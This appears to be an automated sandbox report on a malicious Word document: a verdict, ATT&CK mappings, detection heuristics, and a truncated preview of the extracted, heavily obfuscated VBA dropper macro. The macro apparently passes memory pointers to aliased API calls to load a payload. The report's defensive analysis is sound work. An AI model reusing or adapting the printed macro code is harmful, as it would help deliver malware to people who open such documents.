Verdict: MALICIOUS (Risk Score 122)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS and OLE_VBA_DOCOPEN heuristics. The ClamAV detection 'Doc.Dropper.ZwMacros-6057750-0' strongly suggests its dropper functionality. The VBA macro code, though heavily obfuscated, is typical of malware that downloads and executes additional payloads. The presence of macros and the dropper nature point to a spearphishing attachment delivery method.
Heuristics (4)
- ClamAV: Doc.Dropper.ZwMacros-6057750-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13653 bytes |

SHA-256: e49e838b74c0bb57f5c985dc45e470340646620d0bfce7ad8c3324c4eed368fb

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tableSel()
Dim tempTable
Documents("Log.doc").Tables(1).Select
Set tempTable = Selection.Tables(1).Range
tempRange.Tables(2).Select
End Sub
Sub apprise()
Dim blueeyed As Variant
Dim circumstantially As Byte
bimillenial.hack.Value = Day(#12/5/2007#)
allholy = "botanical"
calotte = scandalously
affections = combinative
Set droughter = bimillenial.hack.SelectedItem
moodiness = 10
aingenium = 38058
cration = 302682
VBA.NPer 0, moodiness, 13772, 57321, 8
dodge = droughter.Name
cancellate = 12 + 5816
bureaucratically = Right(dodge, cancellate)
cloaca = lighterage.balding(bureaucratically)
arab = 57
costal = 21958
countenance = 205713
VBA.NPer 0, arab, 39940, 31223, 4
stretch = "moosewood"
#If Win64 Then
Dim streptomycin As Variant
Dim abrasion As LongPtr
Dim transpontine As LongPtr
Dim mf As Integer
#Else
Dim curled As String
Dim transpontine As Long
Dim field As Byte
Dim abrasion As Long
#End If
overfed = 0
landsturm = "inexterminable"
buccaneer = 44 - 81 + 4133
goat = 38
gingerol = 26577
despiciency = 468775
VBA.NPer 0, goat, 33623, 56657, 5
scots = "true"
soupspoon = piece
perdrix = effuse
craved = 74
stillatitious = 9939
cosmography = 232522
VBA.NPer 0, craved, 32960, 43469, 2
illegibly = cloaca
hymenomycetes = "bloke"
abrasion = drudge(illegibly)
donner = "strategic"
bloodied = "shapeley"
#If Win64 Then
Dim compensable As Byte
Dim statutory As LongPtr
Dim fisher As LongPtr
Dim metallurgist As LongPtr
banned = 117 + 26 + 1169
#Else
Dim statutory As Long
commonplace = 45 + 76 + 374
Dim fisher As Long
Dim metallurgist As Long
banned = commonplace + 2657
#End If
Dim clamatores As Integer
Dim disgorge As Variant
statutory = 0
transpontine = abrasion + banned
fisher = 201527
metallurgist = 3500
piguid = africanamerican(fisher, statutory, transpontine, statutory, statutory, statutory, statutory)
menthol = 52
backstairs = 22009
boards = 201135
VBA.NPer 0, menthol, 31273, 19414, 4
End Sub
Function jumps(acroamatics, astra, vincible)
#If Win64 Then
Dim marlinespike As Byte
Dim valiantly As String
Dim allow As LongPtr
Dim calabash As LongPtr
Dim mb As LongPtr
Dim chalcis As Integer
Dim aphakic As LongPtr
Dim sesotho As LongPtr
#Else
Dim calabash As Long
Dim cyclopes As Byte
Dim allow As Long
Dim heir As String
Dim aphakic As Long
Dim rabbitfish As Long
Dim mb As Long
Dim bloodcurdling As Integer
Dim sesotho As Long
Dim ballot As Integer
Dim gastrocybe As String
#End If
flamboyance = Math.Round(178)
flamboyance = bismarck And 63
calabash = acroamatics
sesotho = vincible
bismarck = Fix(226)
aphakic = astra
dropper = 70
peccavi = 11096
byron = 428446
VBA.NPer 0, dropper, 35421, 19218, 6
cleat = "nimblewill"
allow = 76 - 63 + 123 - 137
extravagation ByVal allow, calabash, aphakic, sesotho, mb
college = college
End Function
Function drudge(alarmism)
Dim clarinetist As Variant
Dim pauperism As Long
Dim manumission As Long
Dim mad As Byte
#If Win64 > 0 Then
Dim outflow As Long
Dim commonsense As LongPtr
buoyant = 50 - 42
Dim medallist As LongPtr
Dim prisonlike As String
Dim vasodilator As String
Dim altostratus As LongPtr
Dim inimitable As Byte
#Else
Dim mire As Variant
Dim commonsense As Long
buoyant = 1 + 3
Dim medallist As Long
Dim purulence As String
Dim altostratus As Long
Dim apprehensiveness As Variant
Dim cochlear As String
#End If
cemetery = VarPtr(commonsense)
doorjamb = jumps(cemetery, VarPtr(alarmism) + 8, buoyant)
mansion = 59 - 120 - 80 + 140
medallist = 0
scolytidae = 101 + 27 - 70 - 58
altostratus = 9902
aboriginal = 120 + 3976
sait = 64
aneroid = influx(ByVal mansion, medallist, ByVal scolytidae, altostratus, ByVal aboriginal, ByVal sait)
bismarck
... (truncated)